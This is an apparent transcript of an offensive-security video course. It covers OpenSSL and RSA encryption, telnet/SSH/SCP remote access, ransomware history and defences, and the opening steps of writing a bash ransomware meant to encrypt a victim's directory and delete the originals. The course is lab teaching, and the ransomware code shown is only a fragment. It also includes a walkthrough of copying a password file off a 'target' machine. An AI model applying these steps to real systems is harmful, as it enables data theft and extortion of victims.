Decryption is the process of converting the ciphertext back to plain text using a key or algorithm, just like we have over here, converting the ciphertext to plain text using a key. All right. So therefore, Encryption and decryption are an integral part of cryptography, and decryption focusing on the secure retrieval of information from its encrypted state, or in other words, the cipher text. All right. So, how to encrypt and decrypt files? To encrypt a file, we make use of what? Open SSL, and this is the command for encrypting a file. Also, this is the command for decrypting a file using Open SSL. Now we have an explanation of these commands used here. So for your information, we are going to be making use of this command here to encrypt and also will decrypt a file. So let me start up my Kali Linux. Right, so I have my Kali Linux running here, and what I'm going to do is to create a sensitive file that contains my password. Then I'm going to encrypt this file and also decrypt this file. So I'm going to start up my terminal. Now I'm going to create a directory where I'm going to store this. So let's call this ransomware development. Then I'm going to navigate into this directory and I'm going to create the sensitive file here. Remember from lecture 4, we talked about creating files and also creating directories using the echo, touch, and the cat command, right? Okay, so now I'm going to make use of nano to create the password file. So I'm going to call this password.txt. Then this is going to contain my password. All right. So the reason I'm making use of this file, let's take for instance, I don't want to forget my password, or anytime I forget my password, I can always come to this file to retrieve my password. Okay, so I'm going to save this and exit. Then I'm going to display the content. Okay, we have here, this is my password, right? Now take for instance, I left my Kali Linux unlocked and I went somewhere to ease myself, and someone comes up to my computer system and sees this text file and also use the cat command to display the content. That means my password is gone, that is my account is gone, because the person will be able to use this password to log in into my account, right? Okay, so what I'm going to do now is to avoid such ugly scenario, I'm going to encrypt this file using OpenSSL, okay? And I'm going to make use of the encryption command here. Then I'm going to make use of this encryption algorithm. Now, AES stands for Advanced Encryption Standard with 256-bit key in cipher block chaining mode. So if you also want to make use of any other encryption algorithm, you can also do that by typing the Open SSL command. So if I should type this, you can see a whole lot of encryption algorithm which you can make use of. So we are making use of, see the one we are making use of here, AES 256 CBC. Now this is widely used and considered secure. All right, so I'm going to exit. Okay, now we are going to be making use of salt to add salt to our password or to the encryption. All right, so I'm going to give it a password. Let's say ABCD123, and I'm going to make use of the password based key derivation function. Okay, now what I'm going to do now is to pass in the file to encrypt, which is password.txt, and then I'm going to provide a name for the output which I want to be like this, password.enc. Okay, so I'm going to hit enter. Now I'm going to display. You can see I've encrypted the password text file. Now let's see the content of this encryption file. You can see it's what gibberish and it's what salted. All right. Okay. So what I'm going to do now is I'm going to delete this, the original file. Okay, now we have the password.enc. So if this user comes up to even display the content of this file, what the user will receive is what? Gibberish. Okay, so now to decrypt this encrypted file, remember from the definition of encryption, we say it is a way of converting a plain text to cipher text. So what we just did now is what we converted password.txt, which is a plain text, into what? A cipher text, password.enc. Okay. All right. So let's decrypt this cipher text. So we're still going to make use of this command with some changes. So we're going to add this -d for decryption. We're also going to make use of this encryption algorithm. Then we are going to remove this because we are not creating a password for it. Do you know why? Because we are not converting a plain text to a cipher text. We are just trying to convert a cipher text to a plain text. So we don't need that password again. The password will be used when we are decrypting, just like we are going to do now. If I hit the enter key, I will be asked to provide the password I used to encrypt the plain text. Okay, so I'm going to hit enter. Okay, we have can't open password.txt for reading. Oh, sorry, I made a mistake there. What I'm supposed to do is to pass in this. Before that, let me show you the content of this directory. There is no password.txt, right? We only have password.encryption, all right? You can also confirm that to see. We only have what? Password.enc. Now, I made use of this option A here to show you hidden directories, okay, or hidden files. All right, so we're going to make use of this right now. So I'm supposed to give in the cipher text, and then the out or the output file is supposed to be the what? TXT. So you see, I'll be asked to supply the password which I use for the encryption. So that was ABCD123, right? I'm going to hit enter. Then ls. Now we have two files here. Let's display the content. Gibberish, which is the cipher text, right? Now I'm going to display that of the text file. You can see I got my original text file or plain text back. All right, so that is how to encrypt and decrypt files. Now, the use of encryption is for what? Confidentiality. It means no other person will be able to have access to a sensitive data apart from the authorized individuals or persons. And in this case, I am the only one authorized to view the content of this password.txt. And since I don't want any unauthorized access to this file, I encrypted it and also decrypted it in case I want to retrieve the password. All right, so now in the next video, you are going to be learning about cryptic connections, where you are going to make use of SSH to carry out a secure remote login and connection to a remote machine. See you in the next video. Hello and welcome. Now, before we move into the cryptic connections lecture, I just decided to make this video to explain to you what public and private keys are, since these are part of cryptography, all right? So I need you to understand the public and private keys. So let's get in. All right, so we have here public key cryptography. Now, let me explain to you this. Take, for instance, I want you to send me a secret message, and I don't want any other person to get access to that message, which means I want the message to be confidential between I and you, right? Okay, so what do? I will have to generate two keys known as a private key and a public key. Now, the private key will be kept by me secretly. Then the public key, I will share it with you publicly or anyone that wants to send me a secret message. All right. So let's get in. Now, the private key is kept secret, used to decrypt data and sign messages. So whenever you send me that secret message, which you encrypted using my public key, which I shared with you openly, I can only decrypt that message using my own private key. So anyone that comes across that message won't be able to decrypt that message unless they have the private key. All right. This helps to maintain confidentiality and integrity of data. Now we have the public key, which is shared openly and it is used to encrypt data and verify signatures. Now in reverse Shamer-Aduman encryption, data encrypted with a public key can only be decrypted with the private key and vice versa. So this ensures confidentiality and authentication in secure communications. Now, RSA is widely used in secure socket layer or transport layer security, and also secure shell and secure data exchange. Don't worry, you are going to learn about SSH in the cryptic connections lecture. All right, so let's move in. Now we have two types of encryption methods, all right? From the previous video, we talked about encryption and decryption, right? Okay, so now under encryption, we have two types of encryption. We have symmetric encryption and asymmetric encryption. Now, symmetric encryption uses the same key for encryption and decryption of files. Now, the practicals we did in the previous video where we encrypted and decrypted some files, we call that was symmetric encryption. Now, for the asymmetric encryption, this uses two different keys for encryption and decryption of files. Now, these two different keys are what we call the private key and the public key. So, asymmetric encryption is also known as public key cryptography. All right. Okay, so symmetric encryption is faster than asymmetric encryption. However, asymmetric encryption is more secure than symmetric encryption. Now, to generate a private key which has 2048 bits, we make use of this command here or this one here, all right? Now, to also extract the public key from the private key, we make use of this command. All right, so when you generate this key here, this key will contain both the private key and the public key. So for you to extract the public key, which you can share publicly with anyone that wants to send you a secret message, you extract it from this key here. All right. Okay, so let's move in. Now we have here using RSA keys for encryption and decryption. Now encrypt with public key. Anyone can encrypt, only private key can decrypt, just like I explained. So this is the command for encrypting a file or that secret message someone wants to send to you. All right. We make use of your public key to encrypt the message. Then when the message gets to you, you make use of your private key to decrypt the message. You can see this enhances what confidentiality. All right, thank you. So we've come to the end. Now, the next thing we're going to do now is to get our hands dirty with some practicals. So let's get into my Kali Linux. All right, so I have my Kali Linux running. So now what we are going to do is this. Take for instance, this Kali Linux is me, right? I'm the one here. Then this Linux Mint here is maybe one of my friend that lives outside my state. All right. Okay, so this my friend, which is called Linux Mint, wants to send me a secret message, which I and him don't want anybody to see or to even know the content of the message. Now, what I will do is this: since the message, since I'm the receiver and my friend is the sender, what I will do is I'm going to generate what I call the public key and the private key. All right. So I'm going to use OpenSSL, then gen, okay, RSA. All right. Then out. Let's call this private key. I'm coming. Let me create a directory first to store this. Let's say make directory, let's say secret message. All right. Oh, sorry. I got that wrong. It's supposed to be make. All right. So I'm going to seed into secret message. Okay, so what I will do here now is to use OpenSSL to generate this key, all right? So out private key dot pem, all right? Then I'm going to generate this 2048 bit key, all right? So I'm going to hit enter, ls. Now we have the private key here, right? Generated. So I'm going to display the content. You can see it here, end of what private key. Now this is it. All right. So now since like I explained, the my friend that is sending me the message needs to have my public key to encrypt the secret message, right? Then I'm going to use my private key to decrypt the message. I need to send my friend what I call the public key. All right. So what I'm going to do now is to extract the public key. So to extract the public key, I'm going to use OpenSSL again, RSA in the private key.pem. then pop out. This means I need the public key to be out. All right, then out public key dot pem. So I'm going to hit enter. All right, so write in RSA key. Let's see. Now we now have the private key and the public key. Let's display the public key to see. Now we have here what? Begin public key, end public key. All right, so since I have the public key now I will send it to my friend. Let's make use of XCP, which is a secure copy protocol. So I'm going to copy this public key dot pem. All right. So, but before you do this, make sure SSH services is running on your Kali Linux and also the Linux Mint, which is the sender machine. All right. Okay, so I'm going to redhound 192.168. Let's call this 208.132. So this is the IP address of my friend, which is this Linux Mint here. I want to send the public key to him. Now, this is how to retrieve the IP address from this machine here. You can see the IP address here, right? Okay. So, and just like I explained, you make sure that the services is running, the SSH service. All right. So, as you are sending it to your friend, make sure your friend's SSH is running. All right. So, you can use this status here to check. Now we have active running. Okay. Okay. So, you can also do the same thing to your Kali. My Kali SSH is already running. All right. Okay. So, I'm going to copy it to his directory. Let's call this yes, let's just leave it at the home directory. All right. So since I'm using SCP, my friend needs to give me his machine's password. So I'm going to supply the password here. All right. Don't get confused. When we get to cryptic connections, you understand the usage of SCP and the SSH. All right. So we've successfully transferred the public key to my friend. Right. So let's come to my friend's house. Right. Let's just call this his house. LS. You can see the public key here, right, which we've transferred. All right, so if my friend wants to transfer or want to send me a message, a secret message right now. So now let's create a directory here. Let's say he has this directory also. I'm going to cd into the secret message directory. Let's say he creates a directory called, a file called secret to John. That's my name, to john.txt, right? Then maybe something like my bank account details. Understand? So maybe you can just fill it in here with his bank account details. All right, so I'm just going to fill in some random values there, then control D to stop. All right, so I'm going to display the contents of that. Let's see. Okay, we have let's edit it to make it look better. So let's see my bank account details. Let's say 1234 is his PIN, and let's say his password, my bank account. Let's see my bank app account. Password is what? Let's say 4567. All right. So I'm going to save this and exit. Now, the content of this secret message is not only about bank account or password. It might be something serious, something like maybe something confidential between John, that is between me and my friend. Yeah, so I just gave you this example as for example's sake. All right. So now my friend here needs to encrypt this message using my public key and then send it to me. All right. So to do that, it's going to use this command: open SSL RSAUTL encrypt. All right. So pop in is what? The public key, which is what? Public dot. Oh, sorry. And to do this, let's copy the public key from the home directory to our directory here. All right, so we now have it here. Then my friend will start what? Encrypting. So encrypt, then pub in, which means the public key, which is my public key here, right? Okay, so the pub in key, that is the public key dot pem. All right, then the text which I want to encrypt and send to John, which is secret to john.txt. All right, then out. This should be the secret to John dot, let's just call this enc. I'm going to call this bin. All right. So let's see. Okay. So ls. So we've successfully created this. So this command RSA2 was deprecated in version 3.0. Use pkey util instead. All right. So I won't go into more details of using this. That's understood. All right. So let's just continue. Now the file has been what encrypted. So let's check the content. Sorry, I'm sorry for that. All right, so is what gibberish. All right, so now since my friend has done this, my friend needs to know my IP address, and maybe before he sends it, I might have sent him my IP address. Okay, so my friend is going to use SCP to send it to me. So to now be secret to john.bin to Kali at 192.168.208.128, right? Now I'm going to tell him to send it to my home directory. Sorry, let me confirm. Okay, home directory secret message, all right? So home directory secret message. Am I correct? All right, secret message. Okay, so this is going to be delivered to my home directory, sorry, to my secret message under my home directory. So I'm going to hit the enter key. So this has been sent to me, all right, secret to john.bin. Now my friend, maybe you will just call me on the phone or give me a phone call informing me that he has sent it already. So we can see it here, secret to john.bin, right? So what I'm going to do now is to decrypt it using my private key. So open SSL, sorry for that, RSA, then decrypt, all right, then the in key, which is my private key, then the in encrypted file, which is secret to john.bin, all right, then out, which is now secret to john.txt. Okay, I'm going to hit enter. Multiple cipher or unknown options, decrypt, all right. So let's see. Oh, I made a mistake there, and this has to be RSA UTL, not RSA. So I'm going to make use of this. Okay, so it's still telling me the same thing, just like we had on the Linux Mint, but just ignore it for now. If you want to know how to use this, then you can research online. But I don't want to go into much details, right? So let's move on. So I'm going to ls. Now we now have our secret to john.txt. So what I'm going to do now is to display secret to John. Let me clear my screen. CAT secret to john.txt, right? Now we have it here. My bank account details is what? 1234. My bank app account password 4567. So this is the beauty of asymmetric encryption, whereby no one can decrypt your message except what? You alone, because you alone have the private key. Others can have your public key to encrypt any message they want to send to you, but it's your own private key that you can use to decrypt. All right, so thank you, and right now you can move on to the next video on cryptic connections. Hello and welcome. Today we are going to learn about cryptic connections. So we are going to carry out remote connection and remote login to a target machine or computer system. Now there are software tools available for one to gain or acquire remote access to a remote machine. Some of these software tools provide an extra layer of security to ensure that the communication channel is encrypted or secured, while some of these software tools don't offer any extra layer of protection to the data that moves to and fro between the client machine and the server machine, or between the attacker's machine and the target machine. All right. So in this video, our Kali Linux will be the attacker's machine, while our Linux Mint here will be the target machine. All right. Okay. So what we are going to do is to make use of SSH and SCP. Now, SSH and SCP, they are considered a secure protocol that you can use for remote login and connection, and also for file transfer. All right. But before we talk about SSH and SCP, I'm going to show you how to make use of telnet. And telnet is considered insecure because it doesn't encrypt the communication channel between communicating machines. All right. So for your information, just know that telnet runs on port number 23. Okay. So what I'm going to do now, I'm going to start up my Kali Linux terminal. If you don't have telnet installed, you can always run this command sudo apt install telnet d, right? Alright, so I have it installed on my Kali Linux already. So let's see if the remote machine, which is our Linux Mint, let's see if it already has the telnet installed. So, but let me just install it straight up. Alright, so Telnet is already the newest version. That means the remote machine has it installed already. Okay, so before I can communicate with this machine, that is before I can establish a remote connection from my Kali Linux to this remote machine, which is our Linux Mint, I need to know the IP address. Let me check that. Okay, so this is the IP address 192.168.208.132. And after I've discovered the IP address, I also need to know the username and the password of this machine. So this is what the username, all right? So what I'm going to do now is I'm going to telnet into 192.168.208.132, all right? Okay, so what's the login or username? Red Hound. The password, I'm going to supply the password. Alright, so we are now successfully connected to the remote machine, Linux Mint. Now, take for instance, you have two computer systems and you and your office, maybe at a workplace working, and you need to connect to your home computer to do some things. Then you can make use of this telnet to connect remotely to your computer at home. And before you can do that, you need to know the IP address, the username, and the password. And that is the same thing we just did here. Okay. So this is how to connect to a remote machine using Telnet. You can also run some Linux commands. Okay. Then you can also create directories. Let's create a directory here called, let's just say hacked. Alright, so we have this directory created. To see if the changes were applied, we'll also come back to the remote machine to check that. You can see it here, hacked. Alright. Okay, so that is how to connect remotely that's how to connect to a remote machine using this insecure protocol called Telnet. All right, so I'm going to exit. Now we are going to make use of SSH to connect remotely to our target machine, in this case the Linux Mint. So to make use of SSH, you need to make sure that the SSH service is running on both your attacker's machine and the target machine. That means in a real life scenario, you must make sure that the computer system you are trying to target has the SSH service running. All right. So I'm going to start the service. So I'm going to check if it is already running. All right. So it is running. Now let's check if it is running on the target machine. All right, so it is already running. So one more thing, if you don't have SSH installed, you can run this command server to install SSH. All right. Okay, so we have it already installed already. Okay, so let's carry out the remote connection or remote login from our Kali Linux to the target machine. All right, so I'm going to use SSH, the username of the target machine, IP address, and I'm going to hit enter. Yes. Then the password for the target machine or the remote machine. Alright, so I've successfully logged into the machine. I can use ls to display the content and also create a directory. Let's say hack2. You can see it here, right? Hack2. Now let's also confirm. You can see it here, hack2. Alright. Okay, so that is how to use SSH to carry out a secure remote login or remote connection. Alright. So I'm going to exit. Now take for instance, you don't want to um, get this kind of information, like you don't want to gain a remote login and be offered with this terminal like this, that is the terminal of the target machine or the remote machine. All you just want to do is just to execute a command and exit. You can also do that using SSH. So I'm going to say SSH redhound 192.168.208.132. Now the command I want to execute, let's say I want to list the content of the home directory. Now before you do this, you need to know the home directory, which is what /home/redhound, right? I want to list the content of the home directory with this command. So I'm going to hit enter. Then the password. You can see after gaining access to the target machine, this command was executed, listing the content of the home directory of the target machine. All right. So that is how to carry out a remote login or remote connection. Now we are going to carry out what we call file transfer. So I'm going to make use of SCP, which stands for secure copy. All right. So for this, we are going to transfer. Let's say I'm going to transfer a file from my Kali Linux or this attacker's machine to the target machine. For example, a malware or a virus or a malicious script. Okay. So let's say let me create a directory. Let's say remote login files. So I'm going to cd into this directory. Now I'm going to create a file. Let's say nano batscript.sh, for example. Let's just give it random content. Just for the sake of example, I'm trying to show you how you can create a malicious script and send it to the target machine. All right. Okay. So now I'm going to send this bad script to the target machine. Now, if you look to this target machine's home directory, there's nothing like bad script here, right? Okay, so I'm going to upload this using SCP. Now I'm going to give it the SCP username and IP address 208.132, right? Now the file I want to copy, which is this batscript.h, sorry, I have to give it the file first, batscript.sh, right? Then where am I going to upload this file into? Now I want to upload it to the home directory, okay? So I will place a colon here, /home/redhound, right? Now if I want to upload it to the document directory, maybe I want to upload it to this document directory, I can also do that by adding the documents directory here. All right, so for this case, we're just going to make use of the home directory. So this command will copy or we upload these bad scripts into this target machine's home directory. So I'm going to hit enter, connect with the password. All right, so bad scripts uploaded. Let's go and confirm that. ls, you can see it here, badscripts.sh. All right. Okay, so the next thing to do now is we are going to try to copy or send a file from this target machine to the attacker's machine. All right. Okay, let's say I want to send a file from this target machine to the attacker's machine. For example, I'm going to connect again using SSH so that I can be able to navigate the directories in the target machine to find any sensitive file or important file that I can steal. All right. So I'm going to do that first. Now I'm going to list the directory. I'm going to cd into desktop to check. There is no file here. So I'm going to cd into I'm going to go back, cd into documents, and then list the content. All right, so this is interesting. We have pwd.test. Let's see the content of this file. All right, we have a password here, my login. This could be a password for one of the users' account, maybe online account or social media account or any account at all. So since I've discovered that this file is sensitive and the user did not encrypt it, all right, so I'm going to transfer this file straight to this attacker's machine or to my attacker's machine. Okay. So to do that, I need to know the directory where this file exists, which is what documents under the home directory. So I'm going to exit and then use SCP to copy that file, redhound at 192.168.208.132, then home redhound documents pwd.test, right? And I'm going to copy it to my current working directory using dot. If I want to maybe copy it to any other directory apart from this current directory, I will supply it like this: home, my Kali, maybe something like documents. Okay, so I want to make use of the current directory, so I'm going to use the single dot, enter, then login. All right, so it has been downloaded to my Kali Linux. I'm going to list it. You can see it here, pwd.test, right? And I can display it. Okay, so now I've successfully stolen the file containing the user's login for one of his or her social media account or online account. Okay, all right. So one more thing I want to show you is this. You might get confused about the syntax of this XCP command. Now, if you are transferring file from your current machine to a target machine, what you have to do is the file name will be here. This is the format. Then the target machine, maybe the username of the target machine, and then the what IP address. Okay. Then the colon, then the directory where you want to um like upload this file into in the target machine. Okay. Then if you are trying to transfer a file or steal a file or copy a file from the target machine down to your attacker's machine or to your own machine, you reverse these two. So when you reverse these two, what you get is what? Username at IP address. Okay. Now the directory where that file you are trying to copy from the target machine down to your Kali Linux machine exists. That's the directory where the file exists. Then your directory in your current machine. Just like I made use of in the example, I made use of dot for the current directory. You can also make use of home, Kali, document, or anything, maybe desktop or so. All right. So that's how to make use of the SCP and SSH command to carry out remote login and also secure file transfer. All right. So one more thing before I go, a security tip. SSH uses port number 22 by default. Meanwhile, if you don't want anyone or any computer connecting to your machine's SSH port, you can change the port number to a different one. This might be useful where an attacker is trying to perform a network scan of open services or on your computer or organization's network by making use of port number 22. To change the port number, we are going to change the port number of our target machine to see if this attacker's machine can be able to SSH or connect or perform a remote login to the target machine. All right. So to do that, we are going to come over to the target machine and we're going to modify the file known as etc. I think SSH, right? SSHD config. All right. So if you come down here, you see this commented line here, port 22, port 22. This means this is the default port number for SSH services. So I'm going to uncomment this and give it a different port number. So let's call this port number 44. We're going to save this, Ctrl S, then Ctrl X. Now we have to restart this service to make the changes to reflect. So ssh service. Okay, so now let's try to see if we can be able to connect to the target machine from our attacker's machine. So SSH red hat at 192.168.208. I think dot 132, right? Okay, let's see. You see connection refused. Why? Kali was trying to connect to this target machine on port number 22, which is the default port number for every SSH services running on a computer system, right? Okay, so it couldn't connect to port number 22, which no longer exists because we've already changed port number here to port number 44. Okay, so that is how to carry out secure remote login and also file transfer. All right, so thank you for your time and see you in the next video where we are going to be talking about ransomware. Hello and welcome back. In this video, we are going to be learning about ransomware. All right, so let's dive in. Introduction. Ransomware is a malicious software that encrypts the files or information in the victim's machine. By doing this, it restricts access to the computer system's files and folders. It demands an online ransom payment to the malware author or to the malware creator to remove the restrictions. Payment can be made in Bitcoin or in other financial transaction method. So this is how a ransomware works. It encrypts your file and requests that you make a payment to the malware creator before your files can be decrypted and delivered to you. All right, let's move on. Now, malicious software known as ransomware is created to prevent users from accessing a computer system or data until a ransom is paid. Usually, it encrypts the victim's files, making them unreadable, and then requests payment for the decryption key, typically in Bitcoin. Now, this is how the user interface of a ransomware looks like. You can see here, enter your payment details to gain access, and this is the amount that the victim is supposed to pay. We have here access to your files and private data has been locked. Then we click here to what make payment. So this is how the ransomware works. So we have here history of ransomware. Now, since its creation, ransomware has seen tremendous change. The AIDS Trojan, often referred to as PC Cyborg, was the first recorded ransomware assault that happened in 1989. Now, floppy disks were used for distribution, and in order to regain access, money had to be sent to a PO box. Since then, ransomware has proliferated or multiplied and became more complex. We have here examples of some ransomware. We have CryptoLocker 2013. This one took place 2013. Now, CryptoLocker was one of the first widespread ransomware attacks. It infected computers through email attachments and encrypted users' files, demanding payment in Bitcoin. It is estimated to have extorted millions of dollars from victims before being taken down by law enforcement. Now we have here WannaCry 2017. WannaCry. WannaCry was a global ransomware attack that exploited a vulnerability in Windows operating systems. It spread rapidly, affecting over 230,000 computers in 150 countries. WannaCry targeted hospitals, businesses, and government agencies, causing significant disruption and financial losses. Now, this is one of the disadvantages of a ransomware attack. Whenever an individual or an organization is faced with a ransomware attack, then there must be what a financial loss, which can be in millions. So let's move on. Now, this is how the WannaCry ransomware that took place 2017. This is how the interface looks like. All right. You can see here your files has been encrypted. Send $300 worth of Bitcoin to this address. So when you make this payment, your files will be decrypted and delivered back to you. But sometimes You can make this payment and you won't be guaranteed that your data will be returned or decrypted and delivered back to you. All right. So sometimes that's they don't after making payment they don't encrypt. Sorry, they don't decrypt or send you the decryption key for you to decrypt your files. All right. So let's move on. We have another one here, NotPetya 2017. Initially appearing as ransomware, NotPetya was later identified as a wiper malware designed to cause destruction rather than collect ransom. Now, it spread via infected software updates, primarily impacting Ukraine but also causing collateral damage worldwide. The total damages were estimated at over $10 billion. Wow, that's a whole lot of money. The next one, Colonial Pipeline 2021. In May 2021, the Colonial Pipeline, a major US fuel pipeline operator, was hit by a ransomware attack carried out by the DarkSide Group. The attack led to the shutdown of the pipeline, causing widespread fuel shortages and price increases. Colonial Pipeline paid a ransom of $4.4 million, part of which was later recovered by the FBI. All right, you can see everything about ransomware is what it must make payment. It must make payment. Now we have McLaurin Healthcare ransomware attack, August 2024. Now, services at McLaurin Healthcare in Michigan were severely affected on August 5th, 2024, by a ransomware attack. Now, the organization had to reschedule elective and non-emergency treatment, which had an impact on cancer care as well as main and specialty care clinics. It wasn't until August 27 that systems were fully restored. That means this ransomware was in full operation for 22 days. If you check here from August 5th to August 27, that is 22 days, 3 weeks. Wow. Let's move on. All right, so we have here what we call ransomware strains. Now, ransomware strains are several kinds of ransomware that are frequently categorized according to the characteristics they have in common. Some examples of well-known ransomware strains include WannaCry, Ryuk, Logbit, and Petya/NotPetya. Now, phishing emails, software flaws, or deceiving people into downloading malicious files are common ways for ransomware strains to spread. So that means the threat vector, that is the channel in which these ransomware um, use to attack their victims is what via phishing emails, software flaws, or deceiving people into downloading malicious files, which I call social engineering. All right. So this is what we call ransomware strains. There are just several kinds of ransomware that are frequently categorized according to their characteristics, which they have in common. Let's move on. Now, how to curb or prevent ransomware attacks? Number one, maintain good cyber hygiene and also what user awareness. Under this, we have avoid phishing emails. Now, don't click on suspicious links or open unknown attachment. Whenever you receive message, maybe an email attachment, you don't just go ahead to click on it. You read thoroughly, read from top to bottom and also from bottom to top, identifying any suspicious item you can find on the attachment before you click on anything there. Else, you will fall victim of what ransomware attack. Secondly, we have verify email senders. Check for misspellings, fake domains, or unusual content. All right. Now, the third one here, use strong password and multi-factor authentication. Now protect account with MFA and what unique password. Fourthly, here we have restrict admin privileges. Limit user permissions to prevent unauthorized software execution. So only give users the access they need to carry out their activities, nothing more. We call that least what privilege. So let's move on. Now we have here system and software security. The first one here was what maintaining cyber hygiene and user awareness, and we had these four items listed under this. Now the second one here is what system and software security. Now keep operating system and software updated. Now some of you don't update your software at all. Now you need to what regularly update your software. Now patch vulnerabilities in Windows, Linux, and your software applications by updating your software. Now disable remote desktop protocol if not needed. Attackers exploit RDP to what to gain access. So always disable these services whenever you are not in use. That is whenever you are not using them or whenever you are not in need of them. So always disable these services or these protocols. Now use an up-to-date antivirus. Enable Windows Defender or use third-party anti-ransomware tools to what protect your computer system. Alright, so restrict macros in Office files. Disable macros unless necessary, as they are often used in attacks. So these are what you need to do to help curb or prevent ransomware attacks. Let's move on. Now we have here backup strategy, defense against encryption. Now before I go on, let me explain something to you. Now from the definition of ransomware, we learned that it encrypts your files and requests you what to make payment to the malware creator before your files can be decrypted and delivered to you, right? Okay, so since ransomware encrypt files, it is a good security measure to always what perform backup of your files. Now we have here what regular backups. Keep offline and cloud backups of important data. Now this is very, very important. Take for instance, you have two important files on your computer system and you get hit by a ransomware attack, and these files, they are now what encrypted. Now the ransomware is telling you to make a payment of 400 USD dollars, or let's say 10 billion USD dollars, right? Like US dollars. Now you don't have that amount of money, okay? But since you have a backup of those files somewhere, maybe in the cloud or offline, you will not worry. What you don't have to do is maybe reinstall your operating system or flash your laptop, then install a new laptop and copy your files back from the backups. All right, so this is why it's good to always perform regular backups. Now use the 3-2-1 backup rule. Maintain 3 copies in 2 different storage types and one off-site, all right, not online. Okay, now test restoring backups. Ensure backups work by performing regular recovery tests. So these are what you need to do to help curb or prevent ransomware attacks. Let's move on. All right, so we have network and access controls as the fourth one. Now, under this, we have segment the network. Prevent lateral movement of ransomware within your infrastructure. Now, take for instance, if you have 4 computer systems within your organization, and one of them, let's say the 4 computer systems are connected together, and one of them gets hit by a ransomware attack, do you know that since they are connected together, there is a high chance that the ransomware will perform a lateral movement from the infected computer to the rest of the computer system. So it's always good to segment what's your network. Now, if these 4 computer systems are segmented, if only one of them gets hit by a ransomware attack, then the remaining 3 will be safe. So that's why it's good to segment your network. Now use application whitelisting. Block unauthorized software from running. Monitor network traffic, detect suspicious outbound connections to known ransomware servers, and also implement zero trust security. Verify every access request, even from internal users. This zero trust security means don't trust anyone, even network traffic coming from within your organization. Don't trust it. Always verify. Always analyze every traffic leaving the organization and every traffic coming into the organization. All right, so this helps to prevent or curb ransomware attacks. Okay, so we've come to the end of the lecture. Thank you. And in the next video, we start building our basic bash ransomware. All right. So see you in the next video. Hello and welcome. So in this video, we are going to start with the development of the basic ransomware using Linux Bash. Now, the word basic in this context doesn't mean that our ransomware won't be fully operational. It just means that our ransomware won't possess some of the features we will see in the advanced bash ransomware. Now, the features of this ransomware will include encryption of files in the target directory, and also removal of the original files or plain text files from the target directory after encryption. Alright? Okay, so before proceeding, I want you to have it at the back of your mind that this bash ransomware, both the basic and the advanced bash ransomware, are built solely for the Linux system and not the Windows system. Alright? Okay, so what I'm going to do now is to start up my terminal. Now I'm going to create a directory where the basic ransomware is going to live. That is the basic bash ransomware is going to live. So let's call this basic bash ransomware world. Yeah. So I'm going to navigate into this basic bash ransomware world. Okay, so what I'm going to do now is to create a file. For the basic bash ransomware. So I'm going to do this. Let's call this basic bash ransomware. Okay, let me just write the full name .sh, right? Okay, so I'm going to make use of nano to open the file. Then right now we can start writing the body of the basic bash ransomware. All right. Okay, so the first thing in every Linux bash script is this line here, which we call the shebang. All right. Now this header starts with a hash sign here. We have this hash sign, then followed by an exclamation mark, and then the path. This is the path /bin/bash. So this is the path to the shell we want the script to run under. And in this case, we are making use of bin bash, right? Okay, so right now, let's add a comment. Comment in Linux bash script starts with the hash sign. So let me add something here. You can also use your own name when you are creating yours. Right, so what I'm going to add here, right, let's add description. And I'm going to call this basic bash ransomware, right? Okay, so I'm going to close that. All right, so we are done with the comment. Now the next thing we are going to do is we are going to make use of the Linux trap command. All right. Okay, don't worry, I'm going to explain all this. So I'm going to make use of this echo. Let's add something like ha ha ha, you are doomed or you are trapped. Add something like this. You are doomed. All right. Okay. Then I'm going to add int and let's call this, I think, okay, exit here. Let me just give this exit. Okay, so I think this is all good, right? Let me see. Okay, so now we talked about the comment, right? In Linux bash script, we make use of this hash sign for comment. Okay, now let's talk about the trap command. Okay, so the reason we are making use of this trap command is to make sure that the user or the victim won't be able to send this int signal to terminate the execution of this basic bash ransomware when it is running on their system. All right. Then also I supply this exit here. Now this exit word which will display the message it will display this message, ha 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 ha, you are doomed, to the target user or to the user when this basic bash ransomware is running on their computer system. Now, when our ransomware finishes executing, this particular message, ha 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 ha, you are doomed, will be displayed if the user tries terminating the ransomware execution using Ctrl C or the seek int here. Alright, so in summary, what I just explained is that whenever the script is running and the user tries to stop the script by issuing Ctrl C to terminate the execution of this ransomware, this message here will be displayed and this ransomware will not stop running until it finishes execution or encrypting the files in the target directory or folder. Now, this message here, ha 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 ha, you are doomed, will also be displayed when this basic bash ransomware finishes executing, and that is the reason we supply this exit here. All right. Okay. So the next thing we are going to do is to coming. Let me separate. Let me add a comment here. This is just a line comment. All right. I'm just to beautify for beautification purposes. All right. Okay, so what I'm going to add here, I'm going to add target directory. Okay, let me leave this empty for now. Then I'm going to add something like, remember from lecture 5 we talked about encrypting files using open SSL, right? And we made use of this command like this. Let me type this again. Then we added salt, then password abcd123, then the password base key derivation function, then the file to encrypt. Let's just call this and then out. All right, if you remember, right? Okay, so what I'm going to do now, we are going to, I'm coming, let me comment this so that we are going to be making use of this to create some constant variables. All right, so I'm going to bring this down. It's not necessary that you put up these comments, this comment having the open SSL command for encryption. I'm just making use of that so that we'll be able to see what I'm doing. All right. So I'm going to create that target directory again. Let me leave that empty for now. And one more thing, a mistake that most Linux users do is to add a space before the equal sign. No, there should be no space. Just leave everything like this. Okay. Now we are going to create cipher. Now this cipher here we represent this AES AES 256 CBC. All right. Then I'm going to create this constant variable here, salt. Let's see. Okay, sorry, let me remove this. Don't worry, we're going to add that when we start writing the command for the open SSL. Just watch out. All right. Then let's say password key encryption 1. No, let me just leave it like this. Password key encryption. Okay. Then equals to this. All right. So now we are going to fill in the values for the target directory and then the password key enc. Okay. Okay. So now since we are going to be sending this ransomware to our victim machine, which is the Linux Mint. All right. So the Kali Linux here will serve as the attacker's machine, while the Linux Mint will serve as the victim or target machine. So since we are going to be sending this ransomware to Linux Mint, which is our target machine or our victim machine, now let's say we have done our homework on footprinting or reconnaissance and found out that the user on the Linux Mint or the victim has an important directory where he or she stores her company's or personal project. And then the path to the directory is something like maybe slash home slash Linux Mint slash desktop or something like that. Okay. Now, which this directory is what we are going to feed into this target directory variable here. Okay. So first of all, what I'm going to do now is I'm going to open a new terminal here. Sorry. Let's launch a new instance. Okay. I'm just trying to show you how to find the target directory so that you can give or supply that to your basic bash ransomware for it to be able to know where to encrypt and decrypt files. Sorry, where to encrypt the sensitive or important files. Okay. So I'm still going to make use of open SSH. So let's see if it's running. Sorry. Okay, it's running. Now let's check on the victim machine if it is also running. Okay, it's also running. So I'm going to connect to it. Remember the command redount at 